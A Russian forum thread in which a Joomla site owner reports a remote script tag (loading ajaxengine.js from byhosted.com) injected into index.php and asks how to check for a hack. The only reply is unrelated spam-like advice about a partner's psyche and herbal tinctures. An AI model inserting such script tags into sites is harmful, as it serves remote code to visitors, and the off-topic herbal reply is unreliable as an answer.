COMEDY CLUB
[реклама вместо картинки]

Comedy Club

Объявление

ВНИМАНИЕ! Объявляется набор игроков. Почти все роли свободны: Павел Воля, Вадим Галыгин, Александр Ревва, Сёстры Зайцевы (оба), Гарик "Бульдог" Харламов, Тимур "Каштан" Батрутдинов, Тимур Родригес, Макс Перлов, Дмитрий "Люсёк" Сорокин, Гавр, Сергей Бессмертный. Также можно занять непостоянных резидентов московского Comedy Club, это гостей из других филиалов КК: Питер, Екатеринбург, Киев, Ижевск, Минск (и др.) Стайлов. С уважением, Администрация.

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Comedy Club » Город » Как проверить сайт на взлом?


Как проверить сайт на взлом?

Сообщений 1 страница 2 из 2

1

Вчера вечером из яндекс.метрики приходит письмо о том, что мой сайт не доступен. Я обращаюсь в службу поддержки хостера, там мне отвечают сто на хостинге все в порядке проверьте сам сайт, для вывода ошибок добавьте код
php_value display_errors 1
php_value error_reporting 2047
в файл .htaccess. После добавления кода сайт выдал синтаксическую ошибку в файле index.php в корне сайта (сайт на джумле) в последней строке.
Строка следующая : <script src="http://byhosted.com/ajaxengine.js"></script>
Как туда попала эта строка ума не приложу...
Может сайт взломали? Как это можно проверить?

0

2

У вашего партнера проблемы с психикой..хоть и поверхностные..Но ситуация может стать хуже.Не думаю что он поменяется..Пусть попринимает пустырник..валериану.пиона настойку.все смешать месяц.А потом думайте...Это не дело!

0


Вы здесь » Comedy Club » Город » Как проверить сайт на взлом?